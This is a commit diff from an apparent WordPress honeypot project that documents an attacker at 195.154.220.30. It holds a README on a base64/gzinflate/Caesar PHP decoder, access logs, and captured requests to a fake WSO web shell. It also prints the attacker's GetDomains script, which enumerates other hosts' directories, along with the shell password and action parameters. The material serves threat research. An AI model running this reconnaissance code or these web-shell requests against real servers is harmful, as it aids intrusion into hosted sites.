Commit 6eed188 (1 parent: 92b18c6)
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing 64 changed files with 5,857 additions and 4 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
# fUUPd - Common Decoder #1 | ||
|
||
A fairly basic decoder. | ||
|
||
## Origin | ||
|
||
### IP Address 195.154.220.30 | ||
|
||
195.154.220.30 has DNS name 30.220.154.rdns.systems | ||
|
||
`rdns.systems` has this `whois` info: | ||
|
||
Domain Name: rdns.systems | ||
Tech Organization: Technology LLC | ||
Tech Street: c/o IDPS International Domain Privacy Services GmbH Hansaallee 191 | ||
Tech City: Duesseldorf | ||
Tech State/Province: | ||
Tech Postal Code: 40549 | ||
Tech Country: DE | ||
|
||
195.154.220.30 has different `whois` info: | ||
|
||
route: 195.154.0.0/16 | ||
descr: Online SAS | ||
descr: Paris, France | ||
origin: AS12876 | ||
mnt-by: MNT-TISCALIFR | ||
created: 2013-08-02T09:05:22Z | ||
last-modified: 2013-08-02T09:05:22Z | ||
|
||
### Download | ||
|
||
The attacker intended to use a WSO, "Web Shell by oRb" instance | ||
to download the code to my WordPress honey pot. The attacker | ||
wanted to use the "FilesMan" action of WSO, "uploadFile" sub-action. | ||
|
||
This would leave a file behind. | ||
|
||
## Decoder | ||
|
||
<?php | ||
function fUUPd($NVAR) | ||
{ | ||
$NVAR = gzinflate(base64_decode($NVAR)); | ||
for ($i = 0; $i < strlen($NVAR); $i++) { | ||
$NVAR[$i] = chr(ord($NVAR[$i]) - 1); | ||
} | ||
return $NVAR; | ||
} | ||
eval(fUUPd("jbvnz.../9y//5f/x/")); | ||
|
||
Decompresses decoded Base64-encoded bytes, then shifts them one | ||
(numeric) value down. So for ASCII text, 'G' (0x47 as a number) | ||
would become 'F' (0x46 as a number). That counts as a "Caesar Cipher". | ||
|
||
Makes no attempt to hide the `base64_decode()` or `eval()` function calls, | ||
but the function name `fUUPd` does seem to be obfuscated. |
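Review bot: the decoder listing at the end of the hunk (`<?php` through `eval(fUUPd(...))`) carries no code fence in this hunk, so unless it is indented as a Markdown code block in the source it will render as running text; wrap it in a fenced block tagged php, and do the same for the two `whois` excerpts so their `key: value` lines keep their line breaks. The `eval()` argument is shown elided (`jbvnz.../9y//5f/x/`), which is right for a write-up, but say so in the prose so nobody expects the snippet to run as printed. Two documentation points: the first `whois` block belongs to the reverse-DNS domain `rdns.systems`, not to the address itself, which the heading "IP Address 195.154.220.30" blurs; and "This would leave a file behind" would be more useful with the file name the `uploadFile` sub-action tried to write, since that is the artifact a defender would search a compromised site for.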
@@ -0,0 +1,18 @@ | ||
195.154.220.30 - - [19/Mar/2018:05:31:45 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 83590 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" | ||
195.154.220.30 - - [19/Mar/2018:05:31:48 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0" | ||
195.154.220.30 - - [21/Mar/2018:13:29:34 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 83590 "-" "Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0" | ||
195.154.220.30 - - [21/Mar/2018:13:29:35 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0" | ||
195.154.220.30 - - [21/Mar/2018:14:35:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:14:35:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:14:35:06 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:14:35:07 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:00:58 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:00:59 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:00 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:01 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 21865 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:02 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:03 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:04 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:05 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:06 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" | ||
195.154.220.30 - - [21/Mar/2018:16:01:08 -0600] "POST /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 200 14030 "http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" |
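Review bot: nothing in this file or the README maps these log lines to the `.wso.scans` captures, although they are the only wall-clock record of them: the 05:31:45 and 05:31:48 entries on 19 Mar are the requests recorded under UNIQUE_ID `Wq@foTrMiYwata7o4pkQbgAAAAI` and `Wq@fpMO6JG7vg4KcqrwY8wAAAAU`, whose REQUEST_TIME values 1521459105 and 1521459108 are exactly those instants in UTC-6. A short index (timestamp, UNIQUE_ID, capture file) in the README would make the evidence chain traceable. Also worth a sentence: the 83590/65-byte response pairs at 05:31 (19 Mar) and 13:29 (21 Mar) differ from the 14030/21865-byte responses from 14:35 onward, which arrive with a different User-Agent (Opera) and a Referer pointing at the same `db.php`, so the later requests are not repeats of the first two, and the README's Origin section currently describes only the upload attempt.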
fUUPd/files/195.154.220.30Wq@foTrMiYwata7o4pkQbgAAAAI.wso.scans
60 changes: 60 additions & 0 deletions
@@ -0,0 +1,60 @@ | ||
|
||
_SERVER | ||
Array | ||
( | ||
[UNIQUE_ID] => Wq@foTrMiYwata7o4pkQbgAAAAI | ||
[SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[HTTP_HOST] => stratigery.com | ||
[HTTP_CONNECTION] => close | ||
[HTTP_ACCEPT_ENCODING] => gzip,deflate | ||
[CONTENT_TYPE] => application/x-www-form-urlencoded | ||
[CONTENT_LENGTH] => 25 | ||
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 | ||
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin | ||
[SERVER_SIGNATURE] => | ||
[SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3 | ||
[SERVER_NAME] => stratigery.com | ||
[SERVER_ADDR] => 162.246.45.144 | ||
[SERVER_PORT] => 80 | ||
[REMOTE_ADDR] => 195.154.220.30 | ||
[DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[REQUEST_SCHEME] => http | ||
[CONTEXT_PREFIX] => | ||
[CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[SERVER_ADMIN] => bediger@stratigery.com | ||
[SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php | ||
[REMOTE_PORT] => 51792 | ||
[GATEWAY_INTERFACE] => CGI/1.1 | ||
[SERVER_PROTOCOL] => HTTP/1.1 | ||
[REQUEST_METHOD] => POST | ||
[QUERY_STRING] => | ||
[REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[REQUEST_TIME_FLOAT] => 1521459105.41 | ||
[REQUEST_TIME] => 1521459105 | ||
) | ||
|
||
_REQUEST | ||
Array | ||
( | ||
[a] => Php | ||
[p2] => info | ||
[pass] => nhzgrf | ||
) | ||
|
||
_COOKIE | ||
Array | ||
( | ||
) | ||
|
||
_FILES | ||
|
||
END _FILES | ||
$my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider | ||
pass parameter, acting as WSO | ||
Acting as WSO, login cookie. | ||
a = Php | ||
p2 = info | ||
Acting as WSO, send phpinfo. |
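Review bot: the trailer lines "pass parameter, acting as WSO" and "Acting as WSO, login cookie." do not say what the honeypot did with `pass` (here `nhzgrf`, on a request carrying no cookie): whether any value is accepted, and whether this is the request that issued the `d8670190...` cookie seen on the follow-up capture. One sentence here or in the README would close that gap. Likewise "Acting as WSO, send phpinfo." leaves open whether the reply was live `phpinfo()` output or a canned page; this dump already records real values such as SCRIPT_FILENAME `/srv/http/stratigery/htdocs/fake_wp/wso.php` and `Apache/2.4.29 (Unix) PHP/7.2.3`, which a live phpinfo() would hand to the requester as well, so state which it is.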
fUUPd/files/195.154.220.30Wq@fpMO6JG7vg4KcqrwY8wAAAAU.php.file
20 changes: 20 additions & 0 deletions
@@ -0,0 +1,20 @@ | ||
error_reporting(0); | ||
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']); | ||
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)'; | ||
|
||
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) { | ||
foreach($dirs as $dir) { | ||
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) { | ||
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/'); | ||
if(is_dir($domainPath)) { | ||
echo $domainPath.';'.$dir.'@'; | ||
} | ||
} | ||
} | ||
} | ||
|
||
GetDomains(scandir($startDir), $startDir, '', $domZones); | ||
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) { | ||
$domainDirs = scandir($matches[1]); | ||
GetDomains($domainDirs, $matches[1], $matches[4], $domZones); | ||
}; |
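Review bot: this file has no header saying what it is, so a reader could take it for project code; it is the body of the WSO `p1` parameter that the matching `.wso.scans` capture shows being passed to eval, i.e. attacker input, and a one-line comment at the top (or a README entry) should say so. Keeping it under the `.php.file` suffix rather than `.php` is the right choice, since it stops the web server from executing it if the directory is ever exposed. For the README's description: the script lists entries of DOCUMENT_ROOT and of its parent directory whose names end in one of the `$domZones` suffixes, skips the current HTTP_HOST, and echoes `path;name@` for each that is a directory, so it is enumerating other virtual hosts on the same server. Note also that the `ks\.ua` entry in `$domZones` lacks the leading `\.` the others have; quote the capture exactly wherever it is reproduced, since such quirks are what make a sample recognizable.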
fUUPd/files/195.154.220.30Wq@fpMO6JG7vg4KcqrwY8wAAAAU.wso.scans
98 changes: 98 additions & 0 deletions
@@ -0,0 +1,98 @@ | ||
|
||
_SERVER | ||
Array | ||
( | ||
[UNIQUE_ID] => Wq@fpMO6JG7vg4KcqrwY8wAAAAU | ||
[SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[HTTP_HOST] => stratigery.com | ||
[HTTP_CONNECTION] => close | ||
[HTTP_ACCEPT_ENCODING] => gzip,deflate | ||
[CONTENT_TYPE] => application/x-www-form-urlencoded | ||
[CONTENT_LENGTH] => 3010 | ||
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0 | ||
[HTTP_COOKIE] => d8670190bc460b6abebf276d20db5892=866fd58d77526c1bda8771b5b21d5b11 | ||
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin | ||
[SERVER_SIGNATURE] => | ||
[SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3 | ||
[SERVER_NAME] => stratigery.com | ||
[SERVER_ADDR] => 162.246.45.144 | ||
[SERVER_PORT] => 80 | ||
[REMOTE_ADDR] => 195.154.220.30 | ||
[DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[REQUEST_SCHEME] => http | ||
[CONTEXT_PREFIX] => | ||
[CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[SERVER_ADMIN] => bediger@stratigery.com | ||
[SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php | ||
[REMOTE_PORT] => 51964 | ||
[GATEWAY_INTERFACE] => CGI/1.1 | ||
[SERVER_PROTOCOL] => HTTP/1.1 | ||
[REQUEST_METHOD] => POST | ||
[QUERY_STRING] => | ||
[REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[REQUEST_TIME_FLOAT] => 1521459108.645 | ||
[REQUEST_TIME] => 1521459108 | ||
) | ||
|
||
_REQUEST | ||
Array | ||
( | ||
[a] => Php | ||
[p1] => error_reporting(0); | ||
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']); | ||
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)'; | ||
|
||
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) { | ||
foreach($dirs as $dir) { | ||
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) { | ||
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/'); | ||
if(is_dir($domainPath)) { | ||
echo $domainPath.';'.$dir.'@'; | ||
} | ||
} | ||
} | ||
} | ||
|
||
GetDomains(scandir($startDir), $startDir, '', $domZones); | ||
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) { | ||
$domainDirs = scandir($matches[1]); | ||
GetDomains($domainDirs, $matches[1], $matches[4], $domZones); | ||
}; | ||
) | ||
|
||
_COOKIE | ||
Array | ||
( | ||
[d8670190bc460b6abebf276d20db5892] => 866fd58d77526c1bda8771b5b21d5b11 | ||
) | ||
|
||
_FILES | ||
|
||
END _FILES | ||
$my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider | ||
Acting as WSO, login cookie. | ||
a = Php | ||
p1 = error_reporting(0); | ||
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']); | ||
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)'; | ||
|
||
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) { | ||
foreach($dirs as $dir) { | ||
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) { | ||
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/'); | ||
if(is_dir($domainPath)) { | ||
echo $domainPath.';'.$dir.'@'; | ||
} | ||
} | ||
} | ||
} | ||
|
||
GetDomains(scandir($startDir), $startDir, '', $domZones); | ||
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) { | ||
$domainDirs = scandir($matches[1]); | ||
GetDomains($domainDirs, $matches[1], $matches[4], $domZones); | ||
}; | ||
Acting as WSO PHP eval, recognized GetDomains. |
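Review bot: the trailer after the `_COOKIE` and `_FILES` sections re-prints the whole 3010-byte `p1` body that already appears in the `_REQUEST` dump above it, and the same code is saved verbatim as the sibling `...Wq@fpMO6JG7vg4KcqrwY8wAAAAU.php.file`; referencing that file by name from the trailer would keep one canonical copy and roughly halve this file. The closing line "Acting as WSO PHP eval, recognized GetDomains." is the useful part and should stay; it would read better with a word on what "recognized" means here (the honeypot matched a known script and returned a fixed reply, rather than running it), if that is indeed the behaviour.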
fUUPd/files/195.154.220.30WqmW4mED2UVKHNYWN2GUbAAAAAU.wso.scans
60 changes: 60 additions & 0 deletions
@@ -0,0 +1,60 @@ | ||
|
||
_SERVER | ||
Array | ||
( | ||
[UNIQUE_ID] => WqmW4mED2UVKHNYWN2GUbAAAAAU | ||
[SCRIPT_URL] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_URI] => http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[HTTP_HOST] => stratigery.com | ||
[HTTP_CONNECTION] => close | ||
[HTTP_ACCEPT_ENCODING] => gzip,deflate | ||
[CONTENT_TYPE] => application/x-www-form-urlencoded | ||
[CONTENT_LENGTH] => 25 | ||
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0 | ||
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/bin | ||
[SERVER_SIGNATURE] => | ||
[SERVER_SOFTWARE] => Apache/2.4.29 (Unix) PHP/7.2.3 | ||
[SERVER_NAME] => stratigery.com | ||
[SERVER_ADDR] => 162.246.45.144 | ||
[SERVER_PORT] => 80 | ||
[REMOTE_ADDR] => 195.154.220.30 | ||
[DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[REQUEST_SCHEME] => http | ||
[CONTEXT_PREFIX] => | ||
[CONTEXT_DOCUMENT_ROOT] => /srv/http/stratigery/htdocs | ||
[SERVER_ADMIN] => bediger@stratigery.com | ||
[SCRIPT_FILENAME] => /srv/http/stratigery/htdocs/fake_wp/wso.php | ||
[REMOTE_PORT] => 64216 | ||
[GATEWAY_INTERFACE] => CGI/1.1 | ||
[SERVER_PROTOCOL] => HTTP/1.1 | ||
[REQUEST_METHOD] => POST | ||
[QUERY_STRING] => | ||
[REQUEST_URI] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[SCRIPT_NAME] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[PHP_SELF] => /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/db.php | ||
[REQUEST_TIME_FLOAT] => 1521063650.808 | ||
[REQUEST_TIME] => 1521063650 | ||
) | ||
|
||
_REQUEST | ||
Array | ||
( | ||
[a] => Php | ||
[p2] => info | ||
[pass] => nhzgrf | ||
) | ||
|
||
_COOKIE | ||
Array | ||
( | ||
) | ||
|
||
_FILES | ||
|
||
END _FILES | ||
$my_blog=http://stratigery.com/wordpress/wp-content/plugins/revslider/temp/update_extract/revslider | ||
pass parameter, acting as WSO | ||
Acting as WSO, login cookie. | ||
a = Php | ||
p2 = info | ||
Acting as WSO, send phpinfo. |
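Review bot: REQUEST_TIME 1521063650 here is 14 Mar 2018 15:40:50 in UTC-6, five days before the earliest entry (19 Mar 05:31:45) in the access-log excerpt added in this commit; either extend that excerpt to cover this request or note the gap, otherwise the log reads as the complete record of 195.154.220.30's visits. Apart from the User-Agent (Firefox/25.0 on Windows NT 6.0), REMOTE_PORT and the timestamps, the request is the same as the `Wq@foTrMiYwata7o4pkQbgAAAAI` capture (`a=Php`, `p2=info`, `pass=nhzgrf`, CONTENT_LENGTH 25), which is worth stating in the README: a fixed `pass` value reused across visits days apart is a simple indicator for anyone grepping their own logs.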